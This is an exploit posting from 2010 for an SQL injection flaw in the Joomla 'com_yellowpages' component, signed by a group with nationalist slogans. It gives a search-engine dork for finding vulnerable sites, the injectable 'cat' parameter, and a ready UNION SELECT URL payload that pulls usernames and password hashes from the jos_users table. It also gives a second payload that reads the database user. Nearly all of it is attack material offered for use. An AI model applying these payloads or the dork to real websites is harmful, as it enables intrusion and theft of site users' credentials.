26 lines
No EOL
1.3 KiB
Text
Executable file
26 lines
No EOL
1.3 KiB
Text
Executable file
===============================================================
|
|
Joomla Component (com_yellowpages) SQL Injection Vulnerability
|
|
===============================================================
|
|
|
|
|
|
# Exploit Title : Joomla "com_yellowpages" Sql Injection Vulnerability
|
|
# Date : 9- 8 - 2010
|
|
|
|
# Author : _aL_bayraqim_
|
|
|
|
# BORDO BEREL?LER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
|
|
############################################################
|
|
Dork = inurl:/index.php?option=com_yellowpages
|
|
############################################################
|
|
--- SQL Injection Vulenrability ---
|
|
SQL Injection Vulenrability component "com_yellowpages"
|
|
http://site.com/index.php?option=com_yellowpages&cat=1923[SQL]
|
|
############################################################
|
|
===[ Exploit ]===
|
|
http://www.site.com/path/index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--
|
|
+Union+select+user()+from+jos_users--
|
|
############################################################
|
|
#.Türk o?lu, !!..Türk k?z? !!..Türklügünü Koru!..
|
|
############################################################
|
|
|
|
|